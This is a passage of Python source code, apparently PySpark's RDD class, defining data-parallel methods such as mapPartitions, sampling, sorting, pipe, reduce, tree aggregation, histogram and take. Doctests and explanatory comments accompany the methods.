"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
            without replacement: probability that each element is chosen; fraction must be in [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
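    # A worked example of the rule above (illustrative numbers): for
    # sampleSizeLowerBound=100 and total=10000 with replacement, p = 0.01 and,
    # since num >= 12, numStDev = 5, giving fraction = 0.01 + 5 * sqrt(0.01 /
    # 10000) = 0.015, i.e. a 50% oversample to make a short sample unlikely.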
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions many parts but one of them has
        # an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
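    # Illustration of the boundary sampling above (hypothetical numbers): with
    # numPartitions = 3 and 30 collected sample keys (sorted by keyfunc), the
    # boundaries are the keys at indices int(30 * 1 / 3) = 10 and
    # int(30 * 2 / 3) = 20; keys below bounds[0] land in partition 0, and the
    # last partition is bounded only implicitly by the maximum key.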
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
                else:
                    # yield nothing: this keeps check_return_code a generator
                    # so it can be chained after the piped stdout lines below
                    for i in range(0):
                        yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
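    # A worked example of the tree above (illustrative numbers): with 100
    # partitions and depth=2, scale = max(ceil(100 ** 0.5), 2) = 10. The loop
    # runs once (100 > 10 + 100 / 10), shuffling down to 10 partially
    # aggregated partitions via reduceByKey; then 10 <= 10 + 1 stops the loop
    # and the final reduce(combOp) combines the remaining values on the driver.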
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. Given the inputs 1
        and 50, the resulting histogram would be 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
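    # Illustration of the scan-size estimate above (hypothetical numbers): if
    # num = 100 and the first scanned partition yielded 10 items, the
    # interpolation suggests int(1.5 * 100 * 1 / 10) - 1 = 14 more partitions,
    # but the cap min(max(14, 1), 1 * 4) lowers that to 4, so the number of
    # partitions scanned grows by at most 4x per round.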
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
